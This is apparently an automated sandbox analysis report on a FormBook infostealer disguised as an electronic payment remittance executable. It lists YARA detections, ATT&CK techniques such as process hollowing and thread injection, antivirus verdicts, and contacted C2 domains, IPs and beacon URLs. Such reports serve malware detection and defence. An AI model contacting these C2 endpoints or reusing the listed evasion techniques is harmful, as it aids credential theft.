          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483527 Sample: Electronic Payment Remittan... Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 38 www.pasalsacongress.com 2->38 40 pasalsacongress.com 2->40 42 www.moominmamalog.com 2->42 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 10 other signatures 2->52 11 Electronic Payment Remittance Document 09.13.21  VRF 65665011119889.exe 3 2->11         started        signatures3 process4 file5 30 Electronic Payment...65011119889.exe.log, ASCII 11->30 dropped 14 Electronic Payment Remittance Document 09.13.21  VRF 65665011119889.exe 11->14         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 17 explorer.exe 14->17 injected process8 dnsIp9 32 198.54.117.211, 49784, 80 NAMECHEAP-NETUS United States 17->32 34 v3lala99.cdnddd.net 103.15.104.66, 49785, 80 GIGABIT-MYGigabitHostingSdnBhdMY Malaysia 17->34 36 9 other IPs or domains 17->36 44 System process connects to network (likely due to code injection or exploit) 17->44 21 raserver.exe 17->21         started        24 autoconv.exe 17->24         started        signatures10 process11 signatures12 54 Self deletion via cmd delete 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 Maps a DLL or memory area into another process 21->58 60 Tries to detect virtualization through RDTSC time measurements 21->60 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe28%VirustotalBrowse
          Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe57%ReversingLabsByteCode-MSIL.Trojan.Taskun
          Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.jiyu-kobo.co.jp/HO0%Avira URL Cloudsafe
          http://www.fontbureau.comgritaHO0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ty0%Avira URL Cloudsafe
          http://www.sandoll.co.kr80%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.goodfont.co.krKKd0%Avira URL Cloudsafe
          http://www.carterandcone.comva0%URL Reputationsafe
          http://www.fontbureau.com-O6d0%Avira URL Cloudsafe
          http://www.fontbureau.comttod0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/eOndo0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.fontbureau.comasF0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0O0%Avira URL Cloudsafe
          http://www.sandoll.co.kr2K0%Avira URL Cloudsafe
          http://www.fontbureau.comttF0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/lOyd0%Avira URL Cloudsafe
          http://www.carterandcone.comypo0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/lOyd0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cnly0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          www.fasilitatortoefl.com/uytf/0%Avira URL Cloudsafe
          http://www.carterandcone.com90%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.fontbureau.com.TTFsO0%Avira URL Cloudsafe
          http://www.fontbureau.comrsiv0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/It0%Avira URL Cloudsafe
          http://www.fontbureau.comgritolOyd0%Avira URL Cloudsafe
          http://www.btt5204.com/uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc0%Avira URL Cloudsafe
          http://www.itsready.support/uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc0%Avira URL Cloudsafe
          http://www.fontbureau.comS0%Avira URL Cloudsafe
          http://www.fontbureau.comceva0%Avira URL Cloudsafe
          http://www.carterandcone.comYou0%Avira URL Cloudsafe
          http://www.carterandcone.como0%URL Reputationsafe
          http://www.founder.com.cn/cncz0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y0nl0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.sandoll.co.krQK0%Avira URL Cloudsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.fontbureau.comdAO0%Avira URL Cloudsafe
          http://www.carterandcone.com%$I/d0%Avira URL Cloudsafe
          http://www.carterandcone.comm0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.como..0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
          http://www.carterandcone.comz0%Avira URL Cloudsafe
          http://www.carterandcone.comy0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/;O$dh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.fontbureau.como0%URL Reputationsafe
          http://www.micro(D.df0%Avira URL Cloudsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.zhongyicts.com.cnrsCI0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/VO0%Avira URL Cloudsafe
          http://www.fontbureau.comcomS0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0O0%Avira URL Cloudsafe
          http://www.carterandcone.comueh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/-O6d0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pasalsacongress.com
          		192.185.52.175
          		truetrue
            		unknown
            parkingpage.namecheap.com
            		198.54.117.215
            		truefalse
              		high
              www.johnharrisagent.com
              		52.71.133.130
              		truefalse
                		high
                v3lala99.cdnddd.net
                		103.15.104.66
                		truetrue
                  		unknown
                  www.moominmamalog.com
                  		183.181.96.104
                  		truefalse
                    		unknown
                    www.yummyblockparty.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.hide.osaka
                      		unknown
                      		unknowntrue
                        		unknown
                        www.pasalsacongress.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.fitotec.net
                          		unknown
                          		unknowntrue
                            		unknown
                            www.btt5204.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.itsready.support
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                www.fasilitatortoefl.com/uytf/true
                                • Avira URL Cloud: safe
                                		low
                                http://www.btt5204.com/uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pctrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.itsready.support/uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pctrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pcfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.jiyu-kobo.co.jp/HOElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comgritaHOElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216627255.0000000005F2F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designersGElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/tyElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sandoll.co.kr8Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/?Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTheElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.goodfont.co.krKKdElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.carterandcone.comvaElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com-O6dElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216127582.0000000005F2F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comttodElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/eOndoElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tiro.comElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comasFElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216461639.0000000005F35000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/0OElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sandoll.co.kr2KElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comttFElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/lOydElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213925578.0000000005F2D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.carterandcone.comypoElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213196484.0000000005F2F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/jp/lOydElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.typography.netDElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cTheElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnlyElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217951742.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217690168.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.com9Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216064181.0000000005F2F000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.galapagosdesign.com/DPleaseElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/Y0Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214195042.0000000005F2D000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com.TTFsOElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comrsivElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216064181.0000000005F2F000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fonts.comElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213130693.0000000005F2D000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226460143.0000000002841000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.sakkal.comElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7raserver.exe, 00000013.00000002.479062532.0000000004DE2000.00000004.00020000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217666193.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.comFElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/ItElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comgritolOydElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.219234603.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comSElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216099763.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comcevaElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.219234603.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.carterandcone.comYouElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.carterandcone.comoElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
